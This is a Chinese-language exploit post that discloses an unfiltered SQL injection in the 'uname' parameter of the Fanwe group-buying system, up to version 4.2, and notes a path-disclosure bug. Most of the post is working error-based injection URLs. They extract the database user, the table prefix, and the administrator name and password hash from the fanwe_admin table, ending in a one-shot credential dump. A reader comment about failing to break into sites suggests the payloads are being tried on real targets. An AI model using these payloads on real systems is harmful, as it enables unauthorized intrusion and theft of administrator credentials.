方维团购系统漏洞sql 通杀到最新4.2

以前用这个团购系统的免费的 不知道怎么现在开始收费了好像
这个漏洞也在几个低版本中一直存在!
漏洞文件:app/source/article_show.php
[php] if ($_REQUEST ['m'] == 'Article' && $_REQUEST ['a'] == 'showByUname') {
$uname = $_REQUEST['uname']; //无过滤
if($uname!='')
{
$uname = rawurldecode($uname);// 不受GPC影响

..........以下代码省略
[/php]
这么明显的 注射 还存在了 N个版本。。。

还有个爆路径的漏洞:mapi/comm.php

exp:
[php]http://0day5.com//index.php?m=Article&a=showByUname&uname=%2527or%201=%28select%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28select%20user%28%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%2523[/php]

获取第一个表,主要是前缀
[php]
http://0day5.com//index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20from%20%28select%20count%28*%29%2Cconcat%28floor%28rand%280%29*2%29%2C%28select%20table_name%20from+information_schema.columns+where+table_schema%3Ddatabase%28%29%20limit%200%2C1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23[/php]

获取账号
[php]
http://0day5.com/index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20from%20%28select%20count%28*%29%2Cconcat%28floor%28rand%280%29*2%29%2C%28select%20adm_name%20from%20fanwe_admin%20limit%200%2C1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
[/php]

获取密码,这里需要截取,我也不知道为毛
[php]http://0day5.com/index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20from%20%28select%20count%28*%29%2Cconcat%28floor%28rand%280%29*2%29%2C%28SELECT%20substr%28%28select%20adm_pwd%20from%20fanwe_admin%20where%20status%3D1%20limit%200%2C1%29%2C9%2C16%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
[/php]

exp:[php]http://0day5.com/index.php?m=Article&a=showByUname&uname=%27or%201=(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20SUBSTRING(CONCAT(adm_name,0x7c,adm_pwd,0x7c),1,60)%20FROM%20fanwe_admin%20LIMIT%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%23[/php]

1 条评论

  1. 123

    搞不到一个站。烦

发表评论